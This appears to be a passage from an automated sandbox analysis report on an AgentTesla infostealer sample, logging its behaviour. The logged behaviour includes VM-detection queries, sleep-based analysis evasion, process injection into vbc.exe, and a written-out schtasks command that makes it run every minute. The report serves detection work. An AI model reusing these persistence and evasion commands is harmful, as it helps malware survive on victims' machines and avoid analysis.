                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840Thread sleep count: 41 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840Thread sleep time: -41000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5232Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5932Thread sleep count: 9658 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620Thread sleep count: 44 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620Thread sleep time: -44000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 5828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1680Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5704Thread sleep count: 9690 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 9658Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 9690Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: vbc.exe, 00000002.00000003.391294158.0000000009F3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.394371318.0000000009F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.593748188.000000000A5E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A3F3AC0 LdrInitializeThunk,2_2_0A3F3AC0
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects files into Windows application
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeInjected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000Jump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000Jump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 7BD008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5132008Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghnJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /fJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeQueries volume information: C:\Users\user\Desktop\pdP5Rv9pPW.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeQueries volume information: C:\Users\user\AppData\Roaming\fghn\fghn.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_09EE4ECC GetUserNameW,2_2_09EE4ECC

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
